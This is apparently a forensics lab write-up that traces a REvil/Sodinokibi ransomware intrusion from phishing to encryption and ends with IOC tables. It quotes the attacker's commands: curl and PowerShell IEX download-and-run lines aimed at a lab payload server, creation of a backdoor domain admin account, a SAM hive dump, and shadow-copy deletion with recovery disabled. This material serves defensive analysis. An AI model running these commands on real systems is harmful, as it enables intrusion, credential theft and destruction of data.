DFIR Lab - REvil/Sodinokibi Ransomware Incident Response
Digital forensics and incident response lab investigating a REvil/Sodinokibi ransomware attack, covering initial access, privilege escalation, lateral movement, credential theft, and encryption using Splunk log analysis and malware analysis techniques.
Summary
This lab walks through the investigation of a REvil/Sodinokibi ransomware incident from initial access through full encryption. The attack began when a user executed a malicious .bat script extracted from a downloaded .zip file, which contacted an initial payload server at hXXp://192.168.200.50. The malware escalated privileges via a UAC bypass (FodhelperBypass.ps1) and dumped credentials using Mimikatz.exe. The initial payload deployed Scvhost.exe and BLACKBOARDk35.exe as Sliver C2 stagers, leveraging the PowerSploit framework for Active Directory enumeration and lateral movement via SSDP (port 1900). The attacker created a backdoor domain admin account before deploying the ransomware payload, which executed via Rundl32.exe to encrypt files across the domain controller and workstation, delete volume shadow copies, modify boot policy, and drop ransom notes.
IOCs and TTPs align with REvil/Sodinokibi ransomware.
Initial Access
The attack originated from a phishing lure delivered as a .zip archive containing a malicious batch script.
Kill chain:
- User downloaded
invoice.zipfrom the internet (ZoneId=3 confirms internet origin) - Archive extracted to reveal
invoice.bat - The
.batscript usedcurlto download the Sliver C2 stager from the attacker’s infrastructure
Key artifacts:
C:\Users\dwight\Downloads\d9e3d760-43ac-4239-9cd2-62962eff1195.tmp
C:\Users\dwight\Downloads\invoice.zip
C:\Users\dwight\Desktop\invoice.bat
Compromised host: WORKSTATION1 (192.168.200.12), user account dwight.
The batch script contained a curl command to retrieve scvhost.exe from the attacker’s server and execute it via cmd.exe:
curl hXXp://192.168.200.50/scvhost.exe -o scvhost.exe
Privilege Escalation
The compromised user account already held local administrator privileges on the workstation. The attacker escalated to domain-level access through the following steps:
UAC Bypass
The attacker used FodhelperBypass.ps1 to bypass User Account Control, downloaded directly into memory:
IEX (New-Object Net.WebClient).DownloadString("hXXp://192.168.200.50/FodhelperBypass.ps1")Reference: This technique abuses the fodhelper.exe binary via registry key manipulation to execute arbitrary commands with elevated privileges without triggering a UAC prompt.
Domain Admin Account Creation
The attacker created a new domain admin account as a persistent backdoor:
C:\Windows\system32\net1 user /add ad_service Password12345
C:\Windows\system32\net1 group "domain admins" ad_service /add /domain
Domain admin group membership was verified with:
C:\Windows\system32\net1 group "domain admins"
Registry Hive Backup
The attacker backed up the SAM registry hive to an unusual location for offline credential extraction:
C:\Windows\system32\reg.exe save hklm\sam sam
Credential Theft
The attacker deployed Mimikatz.exe to extract credentials from the LSASS process memory.
Key artifacts:
C:\users\public\mimi\mimikatz.exe
C:\Windows\system32\lsass.exe
Mimikatz accessed the lsass.exe process to dump plaintext passwords, NTLM hashes, and Kerberos tickets from memory. The tool was staged in C:\users\public\mimi\, a common attacker technique to avoid detection in user-specific directories.
Lateral Movement
The attacker performed network discovery and lateral movement using the following techniques:
SSDP Network Discovery
A device was added to the network and sent multicast discovery traffic to 224.0.0.252 and other multicast addresses using SSDP on port 1900 for service advertising and network discovery.
Active Directory Enumeration
The attacker used PowerView.ps1 from the PowerSploit framework to enumerate the Active Directory environment:
IEX (New-Object Net.WebClient).DownloadString("hXXp://192.168.200.50/PowerView.ps1")PowerView provides extensive AD enumeration capabilities including user, group, computer, GPO, and trust enumeration without requiring any additional tooling on disk.
Reconnaissance Data Collected
- Usernames
- Machine names
- Domain name
- System language
- OS type
- CPU architecture
Data Exfiltration and Encryption
The second-stage payload was executed via Rundl32.exe and performed the following destructive actions:
Pre-Encryption Preparation
Volume shadow copies were deleted and recovery options were disabled to prevent restoration:
C:\Windows\System32\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet & bcdedit /set {default} recoveryenabled No & bcdedit /set {default} bootstatuspolicy ignoreallfailures
Encryption
- All files on DC1 and WORKSTATION1 were encrypted
- Ransom notes were dropped in each directory
- Desktop wallpaper was changed to display the ransom demand
C2 Infrastructure
Sliver C2 Framework
The attacker used Bishop Fox’s Sliver command-and-control framework. Two implants were deployed:
| Implant | Host | Purpose |
|---|---|---|
Scvhost.exe |
WORKSTATION1 | Sliver C2 stager |
BLACKBOARDk35.exe |
DC1 | Sliver C2 stager |
Both binaries have different hashes but are functionally identical Sliver implants deployed under different filenames on each compromised host.
C2 callback: 192.168.200.50:8080
URL Generation
The ransomware component generated C2 URLs by combining hard-coded and random strings with domain names sourced from a configuration file embedded in the binary.
Tooling Summary
| Tool | Purpose |
|---|---|
Scvhost.exe / BLACKBOARDk35.exe |
Sliver C2 stager |
Mimikatz.exe |
Credential dumping (LSASS) |
PowerView.ps1 |
Active Directory enumeration |
FodhelperBypass.ps1 |
UAC bypass |
Rundl32.exe |
Ransomware payload execution |
invoice.bat |
Initial access dropper |
Malware Analysis
Analysis 1 - Rundl32.exe (Ransomware Payload)
| Property | Value |
|---|---|
| SHA256 | 15ef2d6ef402a46165be39d9dbc0081cf28ebca0f407306dd80ac3a73a32c07b |
| MD5 | b572a0486274ee9c0ba816c1b91b87c7 |
| VT Detection | 66/74 |
CAPA Findings:
- Anti-debugging techniques
- Shell code execution
- Data encryption using XOR, AES, RC4, Elliptic-Curve Cryptography, and Salsa20
- Data hashing using djb2
Dynamic Analysis:
- Ransomware iterates through all folders on the system
- Encrypts files in each directory
- Drops a ransom note in every folder
- Changes the desktop wallpaper to display ransom instructions
Analysis 2 - Sliver C2 Stagers
Scvhost.exe
| Property | Value |
|---|---|
| SHA256 | C93A0A916BD0DB48EA419204E74F2609EDF3B2FD39BB87A94B4E094B65A419DB |
| MD5 | 42618a07644aca3da05e912ef23c3227 |
BLACKBOARDk35.exe
| Property | Value |
|---|---|
| SHA256 | dbc72ca000494659f5ffd3b8994a73dd9c4abe622808fb2ed72238b44a0c7073 |
| MD5 | f5b6109d59f4c961b1bbf4bab7bc151e |
String Analysis:
- Sliver C2 protobuf references identified in binary strings
- Paths referencing
github.com/bishopfox/sliverconfirmed framework attribution
Network Analysis:
- Port 1900 SSDP traffic observed to
239.255.255.250(multicast) - C2 callback connection to
192.168.200.50:8080
Debugger Analysis:
- String
github.com/bishopfox/sliver/implant/sliver_limitsconfirmed Sliver framework origin
Key finding: Despite different file hashes, Scvhost.exe and BLACKBOARDk35.exe are functionally identical Sliver implants compiled separately for deployment on DC1 and WORKSTATION1.
Indicators of Compromise
| Type | Value | Description |
|---|---|---|
| SHA256 | 15ef2d6ef402a46165be39d9dbc0081cf28ebca0f407306dd80ac3a73a32c07b |
Rundl32.exe - REvil ransomware payload |
| SHA256 | C93A0A916BD0DB48EA419204E74F2609EDF3B2FD39BB87A94B4E094B65A419DB |
Scvhost.exe - Sliver C2 stager |
| SHA256 | dbc72ca000494659f5ffd3b8994a73dd9c4abe622808fb2ed72238b44a0c7073 |
BLACKBOARDk35.exe - Sliver C2 stager |
| MD5 | b572a0486274ee9c0ba816c1b91b87c7 |
Rundl32.exe |
| MD5 | 42618a07644aca3da05e912ef23c3227 |
Scvhost.exe |
| MD5 | f5b6109d59f4c961b1bbf4bab7bc151e |
BLACKBOARDk35.exe |
| IP | 192.168.200.50 |
Attacker payload server and C2 |
| IP | 224.0.0.251 |
Multicast discovery target |
| IP | 239.255.255.250 |
SSDP multicast address |
| CVE | CVE-2018-8453 |
Win32k elevation of privilege vulnerability |
| Filename | invoice.bat |
Initial access dropper script |
| Filename | invoice.zip |
Phishing lure archive |
| Filename | Scvhost.exe |
Sliver C2 stager (WORKSTATION1) |
| Filename | BLACKBOARDk35.exe |
Sliver C2 stager (DC1) |
| Filename | Rundl32.exe |
Ransomware payload |
| Filename | Mimikatz.exe |
Credential dumping tool |
| Filename | PowerView.ps1 |
AD enumeration (PowerSploit) |
| Filename | FodhelperBypass.ps1 |
UAC bypass script |
| URL | hXXp://192.168.200.50/scvhost.exe |
Stager download URL |
| URL | hXXp://192.168.200.50/PowerView.ps1 |
PowerView download URL |
| URL | hXXp://192.168.200.50/FodhelperBypass.ps1 |
UAC bypass download URL |
| Registry | hklm\sam |
SAM hive backup for credential theft |